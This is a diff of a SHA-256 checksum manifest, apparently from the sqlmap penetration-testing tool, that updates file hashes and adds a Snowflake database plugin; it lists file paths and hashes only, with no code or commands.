-53d98136e508330e3adad43e4a3b0ebc5143c79f0ee7bce5dacf92cb8f7a17fd  extra/runcmd/runcmd.exe_
+3c567dd087963349a04a3f94312d71066bfbe4fd57139878b555aea4a637676d  extra/runcmd/runcmd.exe_
 70bd8a15e912f06e4ba0bd612a5f19a6b35ed0945b1e370f9b8700b120272d8f  extra/runcmd/src/README.txt
-084aea8f337e1aed405a581603324ec01951eadcfd7b4eefaf3000b73f8b2e1e  extra/runcmd/src/runcmd/runcmd.cpp
+baecf66c52fe3c39f7efa3a70f9d5bd6ea8f841abd8da9e6e11bdc80a995b3ae  extra/runcmd/src/runcmd/runcmd.cpp
-e5c02d18abf544eebd18bd789121eaee4d638bae687402feafdd6daec18e82a1  extra/runcmd/src/runcmd/runcmd.vcproj
+a24d2dc1a5a8688881bea6be358359626d339d4a93ea55e8b756615e3608b8dd  extra/runcmd/src/runcmd/runcmd.vcproj
-7c2a12c21b61f727a2b3c6e85bd098e7f8a8b585a74b5eb31eb676ac776d5d57  extra/runcmd/src/runcmd.sln
+16d4453062ba3806fe6b62745757c66bf44748d25282263fe9ef362487b27db0  extra/runcmd/src/runcmd.sln
-5e67c579a62715812a56731396d4cb432f16774a69f82629c6a3218174333605  extra/runcmd/src/runcmd/stdafx.cpp
+d4186cac6e736bdfe64db63aa00395a862b5fe5c78340870f0c79cae05a79e7d  extra/runcmd/src/runcmd/stdafx.cpp
-7bd768f3a742dcebddbe76de26eeee1438355d8600fb19dce945eef6486a3edb  extra/runcmd/src/runcmd/stdafx.h
+e278d40d3121d757c2e1b8cc8192397e5014f663fbf6d80dd1118443d4fc9442  extra/runcmd/src/runcmd/stdafx.h
 38f59734b971d1dc200584936693296aeebef3e43e9e85d6ec3fd6427e5d6b4b  extra/shellcodeexec/linux/shellcodeexec.x32_
 b8bcb53372b8c92b27580e5cc97c8aa647e156a439e2306889ef892a51593b17  extra/shellcodeexec/linux/shellcodeexec.x64_
 cfa1f8d02f815c4e8561f6adbdd4e84dda6b6af6c7a0d5eeb9d7346d07e1e7ad  extra/shellcodeexec/README.txt
-980c03585368a124a085c9f35154f550f945d356ceb845df82b2734e9ad9830b  extra/shellcodeexec/windows/shellcodeexec.x32.exe_
+b1381d5c473a428b3ca30e7f438e86ddcb90b51504065d332df0efd3e321d3dd  extra/shellcodeexec/windows/shellcodeexec.x32.exe_
 384805687bfe5b9077d90d78183afcbd4690095dfc4cc12b2ed3888f657c753c  extra/shutils/autocompletion.sh
 a86533e9f9251f51cd3a657d92b19af4ec4282cd6d12a2914e3206b58c964ee0  extra/shutils/blanks.sh
 cfd91645763508ba5d639524e1448bac64d4a1a9f2b1cf6faf7a505c97d18b55  extra/shutils/drei.sh
@@ -156,71 +155,71 @@ ca86d61d3349ed2d94a6b164d4648cff9701199b5e32378c3f40fca0f517b128  extra/shutils/
 3893c13c6264dd71842a3d2b3509dd8335484f825b43ed2f14f8161905d1b214  extra/shutils/pycodestyle.sh
 0525e3f6004eb340b8a1361072a281f920206626f0c8f6d25e67c8cef7aee78a  extra/shutils/pydiatra.sh
 763240f767c3d025cefb70dede0598c134ea9a520690944ae16a734e80fd98a0  extra/shutils/pyflakes.sh
-71ace4be78edbd8a0d237a7cb342a9d14ebd6011845644c4b360de375d23f8d7  extra/shutils/pypi.sh
+d12fd5916e97b2034ba7fbfa8da48f590dc10807119b97a9d27347500c610c2d  extra/shutils/pypi.sh
 df768bcb9838dc6c46dab9b4a877056cb4742bd6cfaaf438c4a3712c5cc0d264  extra/shutils/recloak.sh
 1972990a67caf2d0231eacf60e211acf545d9d0beeb3c145a49ba33d5d491b3f  extra/shutils/strip.sh
 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3  extra/vulnserver/__init__.py
-11fd73d2a49ae110dff6ee9c28a6703d7573187d639a11a190f699221612b488  extra/vulnserver/vulnserver.py
+9e5e4d3d9acb767412259895a3ee75e1a5f42d0b9923f17605d771db384a6f60  extra/vulnserver/vulnserver.py
 b8411d1035bb49b073476404e61e1be7f4c61e205057730e2f7880beadcd5f60  lib/controller/action.py
-460d3da652b8f55c9eaf0f90be33eddf3355355e5c5b1c98b7fc4d83b1c54fda  lib/controller/checks.py
+ced1c82713afc1309c1495485b3d25a11c95af1f7460ea7922dbb96dacac37b4  lib/controller/checks.py
 430475857a37fd997e73a47d7485c5dd4aa0985ef32c5a46b5e7bff01749ba66  lib/controller/controller.py
-ccec2373f6393f3d644db3de2910e17ef705817063c03e7ca4417f9d7f622527  lib/controller/handler.py
+56e03690c1b783699c9f30cb2f8cc743d3716aba8137e6b253b21d1dd31a4314  lib/controller/handler.py
 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3  lib/controller/__init__.py
-6da126b359e67f73cea7848d3f35dd0890aece16374d04b60490b85e26bf7224  lib/core/agent.py
+2a96190ced25d8929861b13866101812fcadf5cac23dd1dd4b29b1a915918769  lib/core/agent.py
-1da4ec9cd9b67c8b54e4a3d314f8237d58778d8f3a00bc26a1e0540294dca30f  lib/core/bigarray.py
+b13462712ec5ac07541dba98631ddcda279d210b838f363d15ac97a1413b67a2  lib/core/bigarray.py
-ed02b196398b8351ed6989c8fd8ec2a8244f2f9da6ca7b08691219dcc63422d8  lib/core/common.py
+503466d627e7425b4d1a65f4a3abfb8412128de7c146cec711e093cc58d6fa64  lib/core/common.py
 a6397b10de7ae7c56ed6b0fa3b3c58eb7a9dbede61bf93d786e73258175c981e  lib/core/compat.py
-d6e80cecc32601e903aaf5faeb6fd2fe4c6b64a206d7eabb353b7a36e9f2bc46  lib/core/convert.py
+a9997e97ebe88e0bf7efcf21e878bc5f62c72348e5aba18f64d6861390a4dcf2  lib/core/convert.py
 c03dc585f89642cfd81b087ac2723e3e1bb3bfa8c60e6f5fe58ef3b0113ebfe6  lib/core/data.py
-421509c42dab738d908f2453cbdd6eb75eb672a7b6de68bee8c95d867fac79f1  lib/core/datatype.py
+6acb645b1f285b21673c70824b03f6209acc5993b50e50da5ed2c713a30626f5  lib/core/datatype.py
-90070160f9e8f166f9ea69975436fb358eaced6fec8a5947953b2cf050c51434  lib/core/decorators.py
+70fb2528e580b22564899595b0dff6b1bc257c6a99d2022ce3996a3d04e68e4e  lib/core/decorators.py
 147823c37596bd6a56d677697781f34b8d1d1671d5a2518fbc9468d623c6d07d  lib/core/defaults.py
-86fa0ffa7a3e7a7141eab730e3981faf6f0249125ea9a29a57aaa8b65b7503f9  lib/core/dicts.py
+6b366f897e66b9df39df2ee45fef77d46efb7a2d4e294440d3aa7dc1b2f4cedf  lib/core/dicts.py
-186f0331d66e861a942817a3321156a93a6f66c34a19ce90ec1d10aac8bc1cac  lib/core/dump.py
+a033f92d136c707a25927c2383125ddb004d4283db62c004dcd67c3fc242bb1c  lib/core/dump.py
-f5272cda54f7cdd07fb6154d5a1ed1f1141a2a4f39b6a85d3f325fd60ac8dc9a  lib/core/enums.py
+1abf1edeacb85eaf5cffd35fcbde4eee2da6f5fc722a8dc1f9287fb55d138418  lib/core/enums.py
 5387168e5dfedd94ae22af7bb255f27d6baaca50b24179c6b98f4f325f5cc7b4  lib/core/exception.py
 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3  lib/core/__init__.py
 914a13ee21fd610a6153a37cbe50830fcbd1324c7ebc1e7fc206d5e598b0f7ad  lib/core/log.py
-02a2264324caa249154e024a01bcd7cc40dbca4d647d5d10a50654b4415a6d77  lib/core/optiondict.py
+67ea32c993cbf23cdbd5170360c020ca33363b7c516ff3f8da4124ef7cb0254d  lib/core/optiondict.py
-a9ead7442c8e1f34f03ad4db1145c08ee5907904c97e7dfd3202c752618b1092  lib/core/option.py
+8d12a0acbc5e71a40fb19e65af49cd665b10aa313e1b81b336387edf8dd2f14b  lib/core/option.py
-fb0a08ac6f8bb07711e4e895eebf9fb3c8d452cc7aaebcdf78d926cdf051550d  lib/core/patch.py
+9a213f91c8ad468466bd92e5e5805040f904055eb607fb2ed75b4c0e30b8accd  lib/core/patch.py
 49c0fa7e3814dfda610d665ee02b12df299b28bc0b6773815b4395514ddf8dec  lib/core/profiling.py
 03db48f02c3d07a047ddb8fe33a757b6238867352d8ddda2a83e4fec09a98d04  lib/core/readlineng.py
-73ef0895d728fe76bf9abda94d4b97951069532a088d603a064e793bb2ae45d9  lib/core/replication.py
+48797d6c34dd9bb8a53f7f3794c85f4288d82a9a1d6be7fcf317d388cb20d4b3  lib/core/replication.py
-3574639db4942d16a2dc0a2f04bb7c0913c40c3862b54d34c44075a760e0c194  lib/core/revision.py
+0b8c38a01bb01f843d94a6c5f2075ee47520d0c4aa799cecea9c3e2c5a4a23a6  lib/core/revision.py
 888daba83fd4a34e9503fe21f01fef4cc730e5cde871b1d40e15d4cbc847d56c  lib/core/session.py
-3e2ecb51860fac6002973bc2d2149fe6d4f7860646768396e2f211bf41b9f327  lib/core/settings.py
+ecd2ed39ca4391c5ef3e6488539afff0a15d9aa51157a4e2df16b27d0aa577d9  lib/core/settings.py
 cd5a66deee8963ba8e7e9af3dd36eb5e8127d4d68698811c29e789655f507f82  lib/core/shell.py
-00dc9e87db2c13d7eaf18edd503267430460d91baf76760350be545d4a387a9f  lib/core/subprocessng.py
+bcb5d8090d5e3e0ef2a586ba09ba80eef0c6d51feb0f611ed25299fbb254f725  lib/core/subprocessng.py
-d35650179816193164a5f177102f18379dfbe6bb6d40fbb67b78d907b41c8038  lib/core/target.py
+70ea3768f1b3062b22d20644df41c86238157ec80dd43da40545c620714273c6  lib/core/target.py
-85b7d6a724536bfcadd317972d4baec291e3813d6773921ee31755046a950a9a  lib/core/testing.py
+ddf8c5a3dbebd6cdf8b8ba4417e36652d1e040f025175cb6487f1aebc0208836  lib/core/testing.py
-cf4dca323645d623109a82277a8e8a63eb9abb3fff6c8a57095eb171c1ef91b3  lib/core/threads.py
+b5b65f018d6ef4b1ceeebbc50d372e07d4733267c9f3f4b13062efd065e847b6  lib/core/threads.py
 b9aacb840310173202f79c2ba125b0243003ee6b44c92eca50424f2bdfc83c02  lib/core/unescaper.py
-492126b1f4c5ec0a352c507907a6f2067ec3a459250ed1c5d75f6457ef14a01f  lib/core/update.py
+10719f5ca450610ad28242017b2d8a77354ca357ffa26948c5f62d20cac29a8b  lib/core/update.py
-9ed5a0aef84f55d42894a006ff3616e8ee388a55790b04d968c80d1470c6d3bc  lib/core/wordlist.py
+ec11fd5a3f4efd10a1cae288157ac6eb6fb75da4666d76d19f6adf74ac338b5a  lib/core/wordlist.py
 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3  lib/__init__.py
 54bfd31ebded3ffa5848df1c644f196eb704116517c7a3d860b5d081e984d821  lib/parse/banner.py
-a9f10a558684778bdb00d446cb88967fc1bfd413ae6a5f4bd582b3ea442baa87  lib/parse/cmdline.py
+4c56ad26ffb893d37813167de172b6c95c120588bfdc899f102977a2997b9bb9  lib/parse/cmdline.py
-cac08047db1168b24174496268af811cee555e7c3fdd528ef8d895ec49b91d36  lib/parse/configfile.py
+02d82e4069bd98c52755417f8b8e306d79945672656ac24f1a45e7a6eff4b158  lib/parse/configfile.py
 c5b258be7485089fac9d9cd179960e774fbd85e62836dc67cce76cc028bb6aeb  lib/parse/handler.py
-97361d481a97b600a3086b7f228f54ffa68a78df8b63b76bfaa5495d66770b63  lib/parse/headers.py
+5c9a9caee948843d5537745640cc7b98d70a0412cc0949f59d4ebe8b2907c06c  lib/parse/headers.py
 1ad9054cd8476a520d4e2c141085ae45d94519df5c66f25fac41fe7d552ab952  lib/parse/html.py
 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3  lib/parse/__init__.py
-4ca378496510a02c0184b45107889625dc7faf459073e83b3520c66674049af4  lib/parse/payloads.py
+d2e771cdacef25ee3fdc0e0355b92e7cd1b68f5edc2756ffc19f75d183ba2c73  lib/parse/payloads.py
-80d26a30abe948faf817a14f746cc8b3e2341ea8286830cccaae253b8ac0cdff  lib/parse/sitemap.py
+455ab0ec63e55cd56ce4a884b85bdc089223155008cab0f3696da5a33118f95b  lib/parse/sitemap.py
 1be3da334411657461421b8a26a0f2ff28e1af1e28f1e963c6c92768f9b0847c  lib/request/basicauthhandler.py
-a30f18e52463c7c483430201b194350b55a54855507b253af826992e7e5c8435  lib/request/basic.py
+1d5972aba14e4e340e3dde4f1d39a671020187fb759f435ba8b7f522dd4498fa  lib/request/basic.py
 bc61bc944b81a7670884f82231033a6ac703324b34b071c9834886a92e249d0e  lib/request/chunkedhandler.py
 2daf0ce19eacda64687f441c90ef8da51714c3e8947c993ba08fb4ecdc4f5287  lib/request/comparison.py
-626bb6f3316a906a4629c0feb8ecbbcf473fb59e5bc532603c35b6b8f63f1deb  lib/request/connect.py
+f3a457675d7c2b85c7d5da5e336baf2782eaf0abbcb2ecdeb3c0e88d5bb60528  lib/request/connect.py
 8e06682280fce062eef6174351bfebcb6040e19976acff9dc7b3699779783498  lib/request/direct.py
-9ef303e18311e204727dac71c0ed8b814ab6aa1185f2af0a9703b95e5b3ea6e8  lib/request/dns.py
+cf019248253a5d7edb7bc474aa020b9e8625d73008a463c56ba2b539d7f2d8ec  lib/request/dns.py
-ea553def411d6e208fb831a219b0241397fada46aaad432fc3c34addf75a336e  lib/request/httpshandler.py
+f56fc33251bd6214e3a6316c8f843eb192b2996aa84bd4c3e98790fdcf6e8cf0  lib/request/httpshandler.py
 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3  lib/request/__init__.py
 aeeeb5f0148078e30d52208184042efc3618d3f2e840d7221897aae34315824e  lib/request/inject.py
 ada4d305d6ce441f79e52ec3f2fc23869ee2fa87c017723e8f3ed0dfa61cdab4  lib/request/methodrequest.py
-5c3edfca5ad58153ad6cface03777e059d3308b2aa3c38db993b5054145faa8e  lib/request/pkihandler.py
+43a7fdf64e7ba63c6b2d641c9f999a63c12ac23b43b64fedfce4e05b863de568  lib/request/pkihandler.py
-4efead49b76d1237c283ecf281673d8762e09575d05af2a1e24680900ca83d0b  lib/request/rangehandler.py
+b90feeb16e89a844427df42373b0139eb6f6cf3c48ccec32b3e3a3f540c2451e  lib/request/rangehandler.py
 47a97b264fb588142b102d18100030ce333ce372c677b97ed6cb04105c6c9d30  lib/request/redirecthandler.py
 1bf93c2c251f9c422ecf52d9cae0cd0ff4ea2e24091ee6d019c7a4f69de8e5eb  lib/request/templates.py
 01600295b17c00d4a5ada4c77aa688cfe36c89934da04c031be7da8040a3b457  lib/takeover/abstraction.py
@@ -229,9 +228,9 @@ d3c93562d78ebdaf9e22c0ea2e4a62adb12f0ce9e9d9631c1ea000b1a07d04ab  lib/takeover/i
 12e729e4828b7e1456ca41dae60cb4d7eca130a8b4c4885dd0f5501dcbda7fe4  lib/takeover/metasploit.py
 f522436fbd14bdab090a1d305fcac0361800cb8e36c8cbcb47933298376a71e0  lib/takeover/registry.py
 f6e5d6e2ff368fa39943b2302982f33c47eb9a12d01419bef50fcf934b2bce34  lib/takeover/udf.py
-4b5ff4fcfa25454e6a93600d32af42a69bd59151639f569c01920c8610a99656  lib/takeover/web.py
+23d73af417604dab460b74cdc230896153f018a6c00d144019491053640a172f  lib/takeover/web.py
 14179e5273378ec8d63660a87c5cb07a42b61a6fceb7f3bb494a7b5ce10ce2cb  lib/takeover/xp_cmdshell.py
-e29a4054bb5285ba63ae2c0b2c05c8a15b80ec5719ddc4559baa0772d70f24b9  lib/techniques/blind/inference.py
+69928272eed889033e106527f88454dc844bfbb375fcf7c22d5f76ee30c62c9b  lib/techniques/blind/inference.py
 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3  lib/techniques/blind/__init__.py
 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3  lib/techniques/dns/__init__.py
 3df9839fb92a81d46b6194d7adacb43f391efb78b071783c132e8d596ecbfaf1  lib/techniques/dns/test.py
@@ -241,27 +240,26 @@ f552b6140d4069be6a44792a08f295da8adabc1c4bb6a5e100f222f87144ca9d  lib/techniques
 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3  lib/techniques/__init__.py
 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3  lib/techniques/union/__init__.py
 30cae858e2a5a75b40854399f65ad074e6bb808d56d5ee66b94d4002dc6e101b  lib/techniques/union/test.py
-77d2404e5b23fa419113de963bf9eb207582d1548fb0d3f36876d198785c88c3  lib/techniques/union/use.py
+a8a795f29ec6fd66482926f04b054ed492a033982c3b7837c5d2ea32368acec0  lib/techniques/union/use.py
 67dff80a17503b91c8ff93788ccc037b6695aa18b0793894b42488cbb21c4c83  lib/utils/api.py
 ea5e14f8c9d74b0fb17026b14e3fb70ee90e4046e51ab2c16652d86b3ca9b949  lib/utils/brute.py
-3fa1b9fd57ff47c6a283e8381bf70259dce57bb2327f99d8cb56450f1acf2d46  lib/utils/crawler.py
+da5bcbcda3f667582adf5db8c1b5d511b469ac61b55d387cec66de35720ed718  lib/utils/crawler.py
 a94958be0ec3e9d28d8171813a6a90655a9ad7e6aa33c661e8d8ebbfcf208dbb  lib/utils/deps.py
 51cfab194cd5b6b24d62706fb79db86c852b9e593f4c55c15b35f175e70c9d75  lib/utils/getch.py
 853c3595e1d2efc54b8bfb6ab12c55d1efc1603be266978e3a7d96d553d91a52  lib/utils/gui.py
 366e6fd5356fae7e3f2467c070d064b6695be80b50f1530ea3c01e86569b58b2  lib/utils/har.py
-ca82ddc36d660c479bb47201182f47411b1f75a847a556229987f2d005fc5832  lib/utils/hashdb.py
+a1a1ccd5ec29a6a884cfa8264d4e0f7e0b6a0760c692eb402805f926da41e6ee  lib/utils/hashdb.py
 84bf572a9e7915e91dbffea996e1a7b749392725f1ad7f412d0ff48c636a2896  lib/utils/hash.py
-dc68b7fdb2ae0e958f2a553984a94a06832d216a3209f632ad9ff53f17554524  lib/utils/httpd.py
 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3  lib/utils/__init__.py
 22ba65391b0a73b1925e5becf8ddab6ba73a196d86e351a2263509aad6676bd7  lib/utils/pivotdumptable.py
 c1dfc3bed0fed9b181f612d1d747955dd2b506dbe99bc9fd481495602371473a  lib/utils/progress.py
-b0f777739420f7207e57d7073fd94c630a456e4c419d440b98ed6521143952dc  lib/utils/purge.py
+27afe211030d06db28df85296bfbf698296c94440904c390cef0ff0c259dbbc5  lib/utils/purge.py
 c853aa08ab24a00a78969408d60684da0ccb33a2a6693492e0acb7c480ffbcd1  lib/utils/safe2bin.py
 2ee72e83500a1bf02fcd942564fca0053a0c46f736286f0c35dd6904e09f4734  lib/utils/search.py
 8258d0f54ad94e6101934971af4e55d5540f217c40ddcc594e2fba837b856d35  lib/utils/sgmllib.py
 b08373d647f337722983221d9051d8da253bf02e3f084aba8aee642ace8d02a6  lib/utils/sqlalchemy.py
 f0e5525a92fe971defc8f74c27942ff9138b1e8251f2e0d9a8bd59285b656084  lib/utils/timeout.py
-baa49b4c33310fac876e6a855830c3e8e47c4838fffbe7e4e0b8c9e2c4af84a9  lib/utils/tui.py
+f821dc39a75ea48dccfa758788de15d38b9ca6a780a98f59935fb6610f75508c  lib/utils/tui.py
 e430db49aa768ff2cdba76932e30871c366054599c44d91580dde459ab9b6fef  lib/utils/versioncheck.py
 b6cd3059c369bbcb162cfd797596849f9f95078c3b2e91fecee36d3ea1001fc2  lib/utils/xrange.py
 b1bbb62f5b272a6247d442d5e4f644a5bca7138e70776539ec84a5a90433fd13  LICENSE
@@ -395,7 +393,7 @@ ba04af3683b9a6e29e8fa6b3bf436a57e59435cebb042414f2df82018d91599e  plugins/dbms/m
 6bdc774463ac87b1bd1b6a9d5c2346b7edbf40d9848b7870a30d1eaedde4fc51  plugins/dbms/mssqlserver/connector.py
 52c19e9067f22f5c386206943d1807af4c661500bf260930a5986e9a180e96c7  plugins/dbms/mssqlserver/enumeration.py
 838ed364ce46ae37fb5b02f47d2767f7d49595f81caf4bc51c1e25fd18e4aa65  plugins/dbms/mssqlserver/filesystem.py
-c378802702f6ccc3855ec117845f758794ea18baed64f7b571009c6bd7ffc8dd  plugins/dbms/mssqlserver/fingerprint.py
+38ade085f9f1b227eda8c89f78e3ce869e8f430c98bef0cc7cbd2c7dcd60c24e  plugins/dbms/mssqlserver/fingerprint.py
 1ecde09e80d7b709a710281f4983a6831bc02ca3458ae0b97b28446d6db241b4  plugins/dbms/mssqlserver/__init__.py
 a89074020253365b6c95a4fa53e41fb0dc16f26a209b31f28e65910f26b81d21  plugins/dbms/mssqlserver/syntax.py
 57f263084438e9b2ec2e62909fc51871e9eefb1a9156bbe87908592c5274b639  plugins/dbms/mssqlserver/takeover.py
@@ -434,6 +432,13 @@ b76606fe4dee18467bc0d19af1e6ab38c0b5593c6c0f2068a8d4c664d4bd71d8  plugins/dbms/r
 3b49758a10ce88c5d8db081cdb4924168c726d1e060e6d09601796fba2a3fbee  plugins/dbms/raima/__init__.py
 1df5c5d522b381ef48174cfc5c9e1149194e15c80b9d517e3ed61d60b1a46740  plugins/dbms/raima/syntax.py
 5b9572279051ab345f45c1db02b02279a070aafdc651aedd7f163d8a6477390b  plugins/dbms/raima/takeover.py
+5744531487abfb0368e55187a66cb615277754a14c2e7facea2778378e67d5c9  plugins/dbms/snowflake/connector.py
+99f7a319652f7a46f724cfced5555bbaade28e64c90f80b5f0b3cfbbb29a958a  plugins/dbms/snowflake/enumeration.py
+3b52302bc41ab185d190bbef58312a4d6f1ee63caa8757309cda58eb91628bc5  plugins/dbms/snowflake/filesystem.py
+99c62be4ca44f5b059c87516c63919542a087e599895ec6f9bcb1a272df31a61  plugins/dbms/snowflake/fingerprint.py
+1de7c93b445deb0766c314066cb122535e9982408614b0ff952a97cbae9b813a  plugins/dbms/snowflake/__init__.py
+859cc5b9be496fe35f2782743f8e573ff9d823de7e99b0d32dbc250c361c653e  plugins/dbms/snowflake/syntax.py
+da43fed8bfa4a94aaceb63e760c69e9927c1640e45e457b8f03189be6604693f  plugins/dbms/snowflake/takeover.py
 cae01d387617e3986b9cfb23519b7c6a444e2d116f2dc774163abec0217f6ed6  plugins/dbms/sqlite/connector.py
 fbcff0468fcccd9f86277d205b33f14578b7550b33d31716fd10003f16122752  plugins/dbms/sqlite/enumeration.py
 013f6cf4d04edce3ee0ede73b6415a2774e58452a5365ab5f7a49c77650ba355  plugins/dbms/sqlite/filesystem.py
@@ -464,8 +469,8 @@ e2e20e4707abe9ed8b6208837332d2daa4eaca282f847412063f2484dcca8fbd  plugins/dbms/v
 2b2dad6ba1d344215cad11b629546eb9f259d7c996c202edf3de5ab22418787e  plugins/dbms/virtuoso/takeover.py
 51c44048e4b335b306f8ed1323fd78ad6935a8c0d6e9d6efe195a9a5a24e46dc  plugins/generic/connector.py
 a967f4ebd101c68a5dcc10ff18c882a8f44a5c3bf06613d951a739ecc3abb9b3  plugins/generic/custom.py
-ba5d7cdebd0619454ab23b474e36231085f35a70961bfe4e93d5753736799b82  plugins/generic/databases.py
+c091caecc93c01e17fa5432101555cae824492c060b9b7ee35cb49a211365076  plugins/generic/databases.py
-c46904df889742d2c781749e153663cde29a7c77eb8cbaad6d1db3148e9a58bd  plugins/generic/entries.py
+4050f9dfa8a2f8dbe6ae75f91d71b3d1fa3a4b1bd28404c4a346d5a83ad512df  plugins/generic/entries.py
 d2de7fc135cf0db3eb4ac4a509c23ebec5250a5d8043face7f8c546a09f301b5  plugins/generic/enumeration.py
 a02ac4ebc1cc488a2aa5ae07e6d0c3d5064e99ded7fd529dfa073735692f11df  plugins/generic/filesystem.py
 efd7177218288f32881b69a7ba3d667dc9178f1009c06a3e1dd4f4a4ee6980db  plugins/generic/fingerprint.py
@@ -474,13 +479,13 @@ ba07e54265cf461aed678df49fe3550aec90cb6d8aa9387458bd4b7064670d00  plugins/generi
 7c1b1f91925d00706529e88a763bc3dabafaf82d6dbc01b1f74aeef0533537a1  plugins/generic/search.py
 da8cc80a09683c89e8168a27427efecda9f35abc4a23d4facd6ffa7a837015c4  plugins/generic/syntax.py
 eb45fd711efa71ab9d91d815cc8abebc9abc4770311fbb827159008b000f4fc2  plugins/generic/takeover.py
-3a92c47837e9aab99d1ee788fc59404b145b2bec2702ead7ce0a32f45e57a850  plugins/generic/users.py
+45bfd00f09557e20115e6ce7fb52ff507930d705db215e535f991e5fbf7464de  plugins/generic/users.py
 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3  plugins/__init__.py
 423d9bfaddb3cf527d02ddda97e53c4853d664c51ef7be519e4f45b9e399bc30  README.md
 c6ad39bfd1810413402dedfc275fc805fa13f85fc490e236c1e725bde4e5100b  sqlmapapi.py
-168309215af7dd5b0b71070e1770e72f1cbb29a3d8025143fb8aa0b88cd56b62  sqlmapapi.yaml
+4e993cfe2889bf0f86ad0abafd9a6a25849580284ea279b2115e99707e14bb97  sqlmapapi.yaml
-a40607ce164eb2d21865288d24b863edb1c734b56db857e130ac1aef961c80b9  sqlmap.conf
+627d90f1194335b800cbc9cc78db6697cf9e02e193a83598e0d4d0abb55b63b8  sqlmap.conf
-e9d3d52d4c0698b956cc0dc92c177d432b1f97c5918f750baa3e737de4ae574b  sqlmap.py
+4cec2aae8d65d67cd6db60f00217aa05ab449345ed3a38e04697b85b53d755f1  sqlmap.py
 eb37a88357522fd7ad00d90cdc5da6b57442b4fec49366aadb2944c4fbf8b804  tamper/0eunion.py
 a9785a4c111d6fee2e6d26466ba5efb3b229c00520b26e8024b041553b53efba  tamper/apostrophemask.py
 cf26bc8006519bd25ce06d347f72770cd75b61575cf65e5812274e8ab9392eb4  tamper/apostrophenullencode.py
@@ -554,9 +559,9 @@ dcb7a5584390f1604adff075c94139dd23711f2f516b68683ec4208dd0a00fda  tamper/version
 ce1b6bf8f296de27014d6f21aa8b3df9469d418740cd31c93d1f5e36d6c509cf  tamper/xforwardedfor.py
 55eaefc664bd8598329d535370612351ec8443c52465f0a37172ea46a97c458a  thirdparty/ansistrm/ansistrm.py
 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855  thirdparty/ansistrm/__init__.py
-dfb8a36f58a3ae72c34d6a350830857c88ff8938fe256af585d5c9c63040c5b2  thirdparty/beautifulsoup/beautifulsoup.py
+f597b49ef445bfbfb8f98d1f1a08dcfe4810de5769c0abfab7cdce4eebbfcae7  thirdparty/beautifulsoup/beautifulsoup.py
 7d62c59f787f987cbce0de5375f604da8de0ba01742842fb2b3d12fcb92fcb63  thirdparty/beautifulsoup/__init__.py
-0915f7e3d0025f81a2883cd958813470a4be661744d7fffa46848b45506b951a  thirdparty/bottle/bottle.py
+f862301288d2ba2f913860bb901cd5197e72c0461e3330164f90375f713b8199  thirdparty/bottle/bottle.py
 9f56e761d79bfdb34304a012586cb04d16b435ef6130091a97702e559260a2f2  thirdparty/bottle/__init__.py
 0ffccae46cb3a15b117acd0790b2738a5b45417d1b2822ceac57bdff10ef3bff  thirdparty/chardet/big5freq.py
 901c476dd7ad0693deef1ae56fe7bdf748a8b7ae20fde1922dddf6941eff8773  thirdparty/chardet/big5prober.py
@@ -613,21 +618,19 @@ edf23e7105539d700a1ae1bc52436e57e019b345a7d0227e4d85b6353ef535fa  thirdparty/ide
 d846fdc47a11a58da9e463a948200f69265181f3dbc38148bfe4141fade10347  thirdparty/identywaf/LICENSE
 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855  thirdparty/__init__.py
 879d96f2460bc6c79c0db46b5813080841c7403399292ce76fe1dc0a6ed353d8  thirdparty/keepalive/__init__.py
-f517561115b0cfaa509d0d4216cd91c7de92c6a5a30f1688fdca22e4cd52b8f8  thirdparty/keepalive/keepalive.py
+ae394bfae5204dfeffeccc15c356d9bf21708f9e48016681cfb8040ff8857998  thirdparty/keepalive/keepalive.py
 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855  thirdparty/magic/__init__.py
 4d89a52f809c28ce1dc17bb0c00c775475b8ce01c2165942877596a6180a2fd8  thirdparty/magic/magic.py
 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855  thirdparty/multipart/__init__.py
 2574a2027b4a63214bad8bd71f28cac66b5748159bf16d63eb2a3e933985b0a5  thirdparty/multipart/multipartpost.py
 ef70b88cc969a3e259868f163ad822832f846196e3f7d7eccb84958c80b7f696  thirdparty/odict/__init__.py
 9a8186aeb9553407f475f59d1fab0346ceab692cf4a378c15acd411f271c8fdb  thirdparty/odict/ordereddict.py
-691ae693e3a33dd730930492ff9e7e3bdec45e90e3a607b869a37ecd0354c2d8  thirdparty/prettyprint/__init__.py
-8df6e8c60eac4c83b1bf8c4e0e0276a4caa3c5f0ca57bc6a2116f31f19d3c33f  thirdparty/prettyprint/prettyprint.py
 3739db672154ad4dfa05c9ac298b0440f3f1500c6a3697c2b8ac759479426b84  thirdparty/pydes/__init__.py
 4c9d2c630064018575611179471191914299992d018efdc861a7109f3ec7de5e  thirdparty/pydes/pyDes.py
 c51c91f703d3d4b3696c923cb5fec213e05e75d9215393befac7f2fa6a3904df  thirdparty/six/__init__.py
 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855  thirdparty/socks/__init__.py
 7027e214e014eb78b7adcc1ceda5aca713a79fc4f6a0c52c9da5b3e707e6ffe9  thirdparty/socks/LICENSE
-57dba7460c09b7922df68b981e824135f1a6306180ba4c107b626e3232513eff  thirdparty/socks/socks.py
+56ae8fb03a5cf34cc5babb59f8c2c3bb20388a04f94491f6847989428ce49b82  thirdparty/socks/socks.py
 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855  thirdparty/termcolor/__init__.py
